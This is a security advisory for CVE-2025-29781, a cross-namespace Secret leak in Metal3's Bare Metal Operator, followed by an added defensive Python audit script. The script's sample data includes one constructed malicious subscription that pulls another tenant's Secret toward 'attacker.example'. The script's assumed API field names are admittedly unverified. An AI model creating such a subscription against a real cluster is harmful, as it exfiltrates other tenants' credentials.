CVE-2025-29781
CVSS 3.1 Score 6.5 of 10 (medium)
Details
Summary
CVE-2025-29781 affects the Bare Metal Operator (BMO) in Metal3. A Kubernetes account that holds only namespace-level roles can use the `BMCEventSubscription` Custom Resource to make BMO load Secrets from namespaces it is not authorized for into its own namespace, leaking their contents. Before versions 0.8.1 and 0.9.1, BMO did not enforce any namespace restriction on these Secret references. The patch makes BMO refuse to read a Secret from any namespace other than the one holding the corresponding BareMetalHost (BMH) resource, which closes the leak. The issue affects all BMO releases before the fix and is patched in 0.8.1 and 0.9.1. To mitigate before upgrading, copy each referenced Secret into the same namespace as its BMH and keep it there; after upgrading, remove the old copies. Independently of the patch, BMO's RBAC can be narrowed to namespace scope, or the `WATCH_NAMESPACE` configuration option can be used to limit BMO to a single namespace.
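The following audit script is an added example, not code from the advisory or from the Metal3 project. It assumes the Secret reference on a `BMCEventSubscription` lives at `spec.httpHeadersRef` with `name` and `namespace` keys (the `corev1.SecretReference` shape as I recall it from the BMO API; check it against the CRD installed in your cluster), that the CRD's plural is `bmceventsubscriptions`, and that the operator's scope is set through a `WATCH_NAMESPACE` environment variable on the manager container. Sample objects are constructed inline, not captured from a real cluster. It flags subscriptions whose referenced Secret lives outside the subscription's (and therefore the BMH's) namespace, which is the pattern the patched releases reject, and reports whether the BMO Deployment is scoped to a single namespace.

```python
"""Audit Metal3 BMCEventSubscription objects for cross-namespace Secret references.

Added example for CVE-2025-29781; not Metal3 project code. Assumptions:
  * spec.httpHeadersRef is a SecretReference with `name` and `namespace`
  * `kubectl get bmceventsubscriptions -A -o json` yields the input shape
  * BMO scope is controlled by the WATCH_NAMESPACE env var on the manager
"""


def cross_namespace_refs(subscription_list):
    """Return findings for subscriptions that reference a Secret outside their own namespace.

    Before BMO 0.8.1/0.9.1 the operator read such a Secret with its own,
    typically cluster-wide, RBAC, so a namespace-scoped user could pull
    Secrets from any namespace. The patched releases refuse these reads.
    """
    findings = []
    for item in subscription_list.get("items", []):
        meta = item.get("metadata", {})
        spec = item.get("spec") or {}
        sub_ns = meta.get("namespace", "")
        ref = spec.get("httpHeadersRef") or {}
        if not ref:
            continue  # no Secret referenced, nothing to leak
        # Assumption: an empty namespace in a SecretReference resolves to the
        # referencing object's own namespace, which is the safe case.
        ref_ns = ref.get("namespace") or sub_ns
        if ref_ns != sub_ns:
            findings.append({
                "subscription": f"{sub_ns}/{meta.get('name', '')}",
                "host": spec.get("hostName", ""),
                "secret": f"{ref_ns}/{ref.get('name', '')}",
                "destination": spec.get("destination", ""),
            })
    return findings


def watch_namespace(deployment):
    """Return the WATCH_NAMESPACE value on the BMO manager container, or None.

    None (unset or empty) means BMO watches every namespace; the advisory
    recommends narrowing this as an additional mitigation.
    """
    containers = deployment["spec"]["template"]["spec"].get("containers", [])
    for container in containers:
        for env in container.get("env", []):
            if env.get("name") == "WATCH_NAMESPACE":
                return env.get("value") or None
    return None


# Constructed sample input (not from a real cluster).
SAMPLE_SUBSCRIPTIONS = {
    "items": [
        {   # benign: Secret in the subscription's own namespace
            "metadata": {"name": "sub-ok", "namespace": "tenant-a"},
            "spec": {"hostName": "node-0", "destination": "https://events.tenant-a.example/hook",
                     "httpHeadersRef": {"name": "hook-headers"}},
        },
        {   # benign: namespace given explicitly and matches
            "metadata": {"name": "sub-explicit", "namespace": "tenant-a"},
            "spec": {"hostName": "node-1", "destination": "https://events.tenant-a.example/hook",
                     "httpHeadersRef": {"name": "hook-headers", "namespace": "tenant-a"}},
        },
        {   # suspicious: pulls a Secret from another tenant's namespace
            "metadata": {"name": "sub-bad", "namespace": "tenant-a"},
            "spec": {"hostName": "node-2", "destination": "https://attacker.example/collect",
                     "httpHeadersRef": {"name": "exfil-target", "namespace": "other-tenant"}},
        },
    ]
}

BMO_DEPLOYMENT_CLUSTER_WIDE = {"spec": {"template": {"spec": {"containers": [
    {"name": "manager", "env": [{"name": "WATCH_NAMESPACE", "value": ""}]},
]}}}}

BMO_DEPLOYMENT_SCOPED = {"spec": {"template": {"spec": {"containers": [
    {"name": "manager", "env": [{"name": "WATCH_NAMESPACE", "value": "metal3"}]},
]}}}}


if __name__ == "__main__":
    for f in cross_namespace_refs(SAMPLE_SUBSCRIPTIONS):
        print(f"CROSS-NAMESPACE {f['subscription']} host={f['host']} "
              f"secret={f['secret']} -> {f['destination']}")
    for label, dep in (("cluster-wide", BMO_DEPLOYMENT_CLUSTER_WIDE), ("scoped", BMO_DEPLOYMENT_SCOPED)):
        print(f"{label}: WATCH_NAMESPACE={watch_namespace(dep)}")
```

Run it against live data by replacing `SAMPLE_SUBSCRIPTIONS` with the parsed output of `kubectl get bmceventsubscriptions -A -o json` and the Deployment with `kubectl get deploy -n <bmo-namespace> <bmo-deployment> -o json`. Any finding on an unpatched cluster is worth treating as a potential Secret exfiltration attempt; on a patched cluster it indicates a subscription the operator will now refuse to serve.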